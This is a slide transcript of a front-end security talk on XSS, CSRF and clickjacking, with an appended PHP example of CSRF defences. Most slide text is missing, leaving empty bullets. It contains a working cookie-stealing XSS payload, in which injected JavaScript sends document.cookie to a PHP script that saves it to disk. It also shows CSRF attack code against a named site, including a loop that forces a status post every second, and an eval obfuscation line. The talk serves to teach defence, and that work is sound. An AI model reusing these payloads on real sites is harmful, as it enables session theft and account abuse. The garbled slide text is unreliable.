F2e security
Published in: Technology, Design
Transcript

  1. 2
  2. 3
  3. 4
  4. • – – –••
  5. Cross-site scripting XSS
  6. XSS
  7. • Cookie• DOM••…
  8. Yupoo XSS
  9. alert
  10. JavaScript (injected into the vulnerable page):
        var img = new Image();
        img.src = 'get_cookie.php?var=' + encodeURI(document.cookie);
      PHP (get_cookie.php, the receiving side):
        <?php
        if (isset($_GET['var'])) {
            file_put_contents('./cookie/' . time() . '.txt', urldecode($_GET['var']));
        }
  11. “ ”
  12. • Filter input,Escape output• Cookie• noscript?
  13. ••
  14. • http://en.wikipedia.org/wiki/Cross-site_scripting
      • http://www.gracecode.com/archives/2517
      • http://www.gracecode.com/archives/2491
      • http://ha.ckers.org/xss.html
      • http://www.xssed.com/
  15. CSRF Cross Site Request Forgery
  16. <img src="http://.../del.php?id=64" />
  17. <form action="http://jiwai.de/wo/status/update" method="post">
        <textarea name="jw_status"></textarea>
        <input type="submit" />
      </form>
  18. •• GET POST•
  19. setInterval(function() {
        var img = new Image();
        var message = '';  // the message text was stripped from the transcript
        var api = 'http://jiwai.de/wo/status/update';
        img.src = api + '?jw_status=' + message + '&t=' + +new Date();
      }, 1000);
  20. “ ”
  21. • GET POST Cookie• Referer• Token•
  22. • _tb_token_• Referer
  23. • http://en.wikipedia.org/wiki/Cross-site_request_forgery
      • http://www.cgisecurity.com/csrf-faq.html
      • http://www.80sec.com/csrf-securit.html
      • http://www.playhack.net/view.php?id=31
  24. Twitter Clickjacking
  25. 1. iframe Twitter 02. “ ”3. Twitter
  26. ••
  27. CSRF
  28. Cookie Session
  29. • “JS ”••
  30. Q&A
  31. alert(/tHx/).replace(/.+/, eval);
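The CSRF countermeasures listed on slides 21 and 22 (POST only, Referer check, per-session token) applied to a handler like the del.php / status/update endpoints attacked on slides 16 to 19, as an added PHP example. This is not code from the talk; the function names, the request arrays standing in for $_SERVER/$_POST and the host names are constructed for illustration.

```php
<?php
// Added example, not from the slides: server-side CSRF checks for a
// state-changing endpoint. Requests are constructed arrays, not real
// $_SERVER/$_POST data; all names here are illustrative.

function issue_csrf_token(array &$session): string {
    // One random token per session; the site embeds it in its own forms.
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function is_csrf_safe(array $req, array $session, string $site_host): bool {
    // 1. State changes only via POST: the <img src="...del.php?id=64">
    //    vector of slide 16 arrives as GET and fails here.
    if (($req['method'] ?? '') !== 'POST') {
        return false;
    }
    // 2. Referer check: a form auto-submitted from another site (slide 17)
    //    carries that site's Referer. A missing Referer is rejected as well;
    //    relax this only if you accept the false positives from clients
    //    that strip Referer for privacy.
    $referer_host = parse_url($req['referer'] ?? '', PHP_URL_HOST);
    if (!is_string($referer_host)
        || strtolower($referer_host) !== strtolower($site_host)) {
        return false;
    }
    // 3. Token check, the primary defence (1 and 2 are defence in depth).
    //    hash_equals keeps the comparison constant-time.
    $token = $req['post']['csrf_token'] ?? '';
    return $token !== '' && isset($session['csrf_token'])
        && hash_equals($session['csrf_token'], $token);
}

// Constructed requests mirroring the slides' three scenarios.
$session = [];
$token   = issue_csrf_token($session);
$host    = 'jiwai.de';

$img_get    = ['method' => 'GET',  'referer' => 'http://other-site.example/',
               'post' => []];
$cross_post = ['method' => 'POST', 'referer' => 'http://other-site.example/',
               'post' => ['jw_status' => 'spam']];
$legit_post = ['method' => 'POST', 'referer' => 'http://jiwai.de/wo/',
               'post' => ['jw_status' => 'hi', 'csrf_token' => $token]];

var_dump(is_csrf_safe($img_get, $session, $host));
var_dump(is_csrf_safe($cross_post, $session, $host));
var_dump(is_csrf_safe($legit_post, $session, $host));
```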
